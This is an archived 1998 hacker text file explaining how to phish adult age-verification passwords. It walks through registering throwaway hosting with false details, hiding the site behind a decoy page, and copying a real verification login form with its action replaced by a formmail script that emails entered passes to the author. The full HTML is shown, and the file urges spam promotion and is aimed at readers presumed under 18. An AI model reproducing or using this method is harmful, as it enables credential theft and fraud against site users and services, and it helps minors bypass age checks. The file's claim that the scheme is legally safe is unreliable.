home *** CD-ROM | disk | FTP | other *** search
/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / hacking / internet / hack_avs.txt < prev    next >
Encoding:
Text File  |  2003-06-11  |  12.0 KB  |  248 lines
  1.                                                                 98/03/29
  2.  
  3.                     The Fixer's Tech Room Presents
  4.  
  5.             <<<          Harvesting AVS Passes          >>>
  6.  
  7.                     (C)opyleft 1998 Homo ex Inferis
  8.  
  9. ------------------------------------------------------------------------
  10.  
  11.                    What Freud and Scrooge Understand
  12.  
  13. OK, you downloaded this file because you want one thing... PORN!  And
  14. you don't want to pay to use each of the dozens of AVS's (Adult
  15. Verification Services) out there that most good porno sites sit behind.
  16. You know what I am talking about, that "adult check" password page where
  17. you have to enter a password that proves you're an adult to get into the
  18. site.  Only catch is, that password can cost up to $69!
  19.  
  20. So what do you do?  Well, you can fork over a minimum of $25 for just
  21. ONE AVS pass which will only be good for a minority of sites, or you can
  22. try and commit credit card fraud, which will get you nowhere but busted
  23. fast, or you can try begging for "hacked" passes in newsgroups, which
  24. will get you flamed and treated like a loser.
  25.  
  26. Or you can use your brain and get yourself a free pass, or use your
  27. brain and expend some effort and harvest a crapload of them!
  28.  
  29. ------------------------------------------------------------------------
  30.  
  31.                        The Easy Way to Free Porn
  32.  
  33. If you're an adult, perhaps the easiest way to get a free AVS pass is to
  34. run an adult site yourself.  Most AVSes give their webmasters free
  35. accounts.  All you have to do is put up a free web page somewhere with a
  36. few dozen GIFs or JPGs of naked people, sign up with an AVS as a
  37. webmaster, and that's it.
  38.  
  39. If you put up a fairly good site and advertise it well (sorry, that
  40. means spam or IRC bots) then you stand a really good chance of making a
  41. good secondary income from the AVSes, as they all pay webmasters for
  42. every customer who signs up for a pass through their sites.  A win-win
  43. situation for you and the AVS, and no hacking is involved.  In fact some
  44. people actually make their living from running really big FREE adult
  45. websites; they receive enough hits to their sites that the revenue from
  46. AVSes and banners pays all their bills!
  47.  
  48. But none of that probably applies to you.  The fact that you're
  49. interested in a file on how to hack an AVS means that you're probably
  50. under 18.  If you are, shame on you!  You shouldn't know what naked
  51. people look like or how babies are made, Jerry Farwell said so!
  52.  
  53. Sad news then if you are a young person, because it means that even if
  54. you put up an adult website, the AVSes won't touch you with a 69 foot
  55. pole.  So you can kiss that free pass and secondary income (which isn't
  56. enough to live on but more than most teens' allowances) goodbye.  Oh
  57. well.  Maybe a good fake identity will get around that, but that's
  58. another subject for another text file.
  59.  
  60. But wait, there may be, just MAY be a chance.
  61.  
  62.  
  63. ------------------------------------------------------------------------
  64.  
  65.                     The Hard Way - Harvesting Passes
  66.                       (or, P.T. Barnum was right)
  67.  
  68. Let's make a few assumptions here.
  69.  
  70. (#1) You are under 18 or for whatever other reason can't sign up as an
  71. AVS webmaster.  Maybe you're chicken that your wife will open your mail
  72. and discover a $750 check from Porno Pass, I don't know.  Maybe you're
  73. 17 and a good bullshitter but your parents are Jehovah's Witnesses, I
  74. don't know.  Point is, doing it the legit way is not an option for you.
  75. That sucks but that's why I wrote this file.
  76.  
  77. (#2) You COULD still put up an adult site, because you have webspace and
  78. porno files at hand.  Maybe you raided some Swedish BBS or something, I
  79. don't know.  Maybe your uncle screwed his pet llama and you got video of
  80. it, I REALLY don't want to know.  Point is, you can still put up a porno
  81. site and all is not lost.  So you can STILL use this file!
  82.  
  83. (#3) Your webspace and email are not traceable back to you (i.e. you got
  84. a Tripod homepage and a usa.net email address).  Note that Tripod will
  85. cut you off if they find out you are hosting porno.  So will Geocities,
  86. Angelfire, well pretty much all the ones you can use.  But it usually
  87. takes them weeks to figure it out, especially if the porno isn't linked
  88. from the default page.  The point here is that you gotta do this with a
  89. web page and email address that you can access and control but that you
  90. don't care about.  With this method you CAN expect to be discovered in
  91. the act after a while, so don't risk having your real site shut down if
  92. you have one.
  93.  
  94. OK, now if you haven't got webspace and email, go sign up with Tripod or
  95. Geocities and usa.net or hotmail.  Give bogus information.  Spoof an IP
  96. if you know how.  Use a public terminal if you must.  Just don't leave a
  97. paper trail home.
  98.  
  99. Next, put up a stupid "default" page that has nothing to do with porno.
  100. Just something that someone randomly surfing around would find.  A fan
  101. page or something.  We don't care; the point is to avoid the webspace
  102. host seeing your porno right away so they can turf you before you even
  103. get started.  This default page is just a front for the purpose of
  104. temporarily defraying suspicion from your webspace provider's TOSsers.
  105.  
  106. Then, in a subdirectory, set up an adult web page.  Use all the webspace
  107. you are allowed, because you are going to arouse suspicion if there's
  108. not much stuff on your site.  Make some fancy logos and set up the site
  109. so it looks nice and legit.  Use text files (XXX rated stories) if you
  110. have a real space crunch, they're smaller than pictures.
  111.  
  112. Now here's the tricky bit.  You need to spoof the verification page of
  113. the AVS whose passes you wish to gather.
  114.  
  115. Now, if you just want to gather a few passes quickly, then you don't
  116. have to go to much effort to do this, just make an official-looking HTML
  117. form where the surfer enters his password, and a SUBMIT button below.
  118. Only, instead of linking to the AVS's verification script, it emails the
  119. form to your throwaway account.
  120.  
  121. If you want your page to last a little while, then you need to more
  122. accurately spoof the AVS's logon page.  To do this, just visit another
  123. site that uses that AVS and save the HTML source.  Change the Submit
  124. action to email the form to your throwaway address.  Leave in everything
  125. else, including the signup script.  Makes it look more real.  There is a
  126. detailed example later in this article.
  127.  
  128. When all of this is set up, post a bunch of your pictures/stories to
  129. Usenet newsgroups where people are looking for that sort of thing.
  130. Include the URL to your spoof page.  Make sure to include HTML in your
  131. message body so that users of web-based news services can just click to
  132. your spoof page if they happen to like what they see.  Within the hour,
  133. your page will begin to get hits.  Stick a counter on it if you don't
  134. believe me.
  135.  
  136. You can do something similar with IRC Bots in channels that allow
  137. Adbots.
  138.  
  139. ------------------------------------------------------------------------
  140.  
  141.                        Example of a Pass Catcher
  142.  
  143. Here is a form used by a well-known AVS to login to a free site.  With
  144. minimal modification, you could use this directly, although I recommend
  145. visiting some other sites which use this AVS to get a more up-to-date
  146. form.
  147.  
  148. <HTML>
  149. <BODY>
  150. <p><center><table border=4 cellpadding=10 cellspacing=4 bgcolor=#ffffff><tr>
  151. <td colspan=3><center><h1><font color=#000000>
  152. <font size=9><font color=#dd0000><b>A---- Ch---</b></font color>
  153. <h2>is the Internet's<br><font size=6><font color=#0000dd>Largest
  154. </font color><font size=4>&</font><font color=#0000dd> Best</font color></font>
  155. <br>age verification system, protecting<br> <font color=#dd0000>
  156. THOUSANDS</font color> of Great Adult Sites<br>And growing rapidly!
  157. <br>Now With <font color=#dd0000><i>Instant Activation!</i></font color>
  158. </td></tr><tr><td colspan=3><font color=#000000><center><h2>Enter with your
  159. <a href=http://secure.adultcheck.com/cgi-bin/apply.cgi?4193>Adult Check
  160. </a> ID:</td></tr><tr><td><font color=#000000><h3>Adult Check ID#:</td><td>
  161.  
  162. <--- This is the START of the Form code you must change --->
  163.  
  164. <FORM METHOD="POST" ACTION="http://id.adultcheck.com/cgi-bin/idsearch.cgi">
  165. <input type="hidden" name="page" value="4193">
  166. <INPUT size=30 maxlength=30 name="id"></td><td><center>
  167. <INPUT TYPE="submit" VALUE="Enter This Site!"></td></tr>
  168.  
  169. <--- This is the END of the Form code you must change --->
  170.  
  171. <tr><td colspan=3><center><h2>
  172. <a href=http://secure.adultcheck.com/cgi-bin/apply.cgi?4193>
  173. Apply Now for an A---- Ch--- ID<br>The most Powerful ID on the
  174. Net!</a></td></tr><tr><td colspan=3>
  175. <center><h3><a href=http://www.adultcheck.com/cgi-bin/merchant.cgi?4193>
  176. WEBMASTER$ click here to protect your $ite!</a>
  177. </td></tr></table><br></center></form><br>
  178.  
  179. </BODY>
  180. </HTML>
  181.  
  182.  
  183.  
  184. <--- Before you set up your adult page, ask your webmaster for    --->
  185. <--- instructions on how their form to email service works.  This --->
  186. <--- is a generic example which will need modification depending  --->
  187. <--- on the peculiarities of your web service!                    --->
  188.  
  189. <--- This is the START of the HTML you must replace the above with --->
  190.  
  191. <FORM ACTION="/cgi-bin/formmail.pl" METHOD="POST" ENCTYPE="application/x-www-form-urlencoded">
  192. <INPUT TYPE="HIDDEN" Name="username" Value="yourusername">
  193. <CENTER><INPUT NAME="subject" VALUE="AC Snarfed Code" TYPE=HIDDEN></CENTER>
  194. <CENTER><INPUT NAME="recipient" VALUE="youraddress@hotmail.com" TYPE=HIDDEN></CENTER>
  195. <INPUT TYPE="HIDDEN" Name="redirect" Value="http://yourwebhost.com/~yourpage/porno.htm">
  196. <INPUT size=30 maxlength=30 name="id"></td><td><center>
  197. <INPUT TYPE="submit" VALUE="Enter This Site!"></td></tr>
  198.  
  199. <--- This is the END of the HTML you must replace the above with --->
  200.  
  201. Do you follow what is happening here?  This is part of an HTML form.  We
  202. took out the "SUBMIT" part which diverts you to the AVS's verifier.  In
  203. the original, if you submit a valid pass then the verifier diverts you
  204. to the protected page and you are set to start whacking off.  In the
  205. modified code, the SUBMIT part instead emails the pass to you.  When
  206. this is done, the "REDIRECT" part sends you off to your porno page, none
  207. the wiser.  If you have promoted your page with enough/good enough spam,
  208. you should rack up a *lot* of hits very soon.
  209.  
  210. The one part of this that should be obvious by now is that everyone gets
  211. through to the porn, even if they enter a wrong pass.  This means
  212. eventually someone will notice and report your site to the AVS, which is
  213. where all hell will break loose.  So this method won't last forever, and
  214. you shouldn't expect it to.  But experience showed that the majority of
  215. responses received were valid passes.
  216.  
  217. Can you imagine what it's like to check your mail, to find that you have
  218. 35 pieces waiting, all of them containing valid AVS passes?  And to do
  219. the same again the next morning?
  220.  
  221. ------------------------------------------------------------------------
  222.  
  223.                             Well, what now?
  224.  
  225. Is this method "right?"  Is it legal?  Well, no one has ever been
  226. arrested for impersonating a website.  You will definitely lose the
  227. webspace when your game is discovered but that's as far as it should go.
  228.  
  229. The security of AVS passes is an illusion; anyone can spoof another site
  230. and get users to enter sensitive data.  This sort of thing would apply
  231. to credit cards or login passwords too; there is just no authentication
  232. mechanism.  A few people may suspect something when you spoof another
  233. site like this but most won't and will blithely enter their expensive
  234. and sensitive information never knowing any better.  In a way, this is
  235. kind of a hands-off form of social engineering where you don't have to
  236. have any gift of the gab to pull it off.  Like any really good scam.
  237.  
  238. So next time you see someone posting to alt.2600 or some other newsgroup
  239. begging for AVS passes, offer them a trade.  With this information you
  240. should be able to fish out all the passes you will ever need and lots
  241. more.
  242.  
  243.  
  244. ------------------------------------------------------------------------
  245. Fixer's Tech Room: http://techroom.base.org
  246. Original and Archived Hacks for everyone.
  247.  
  248.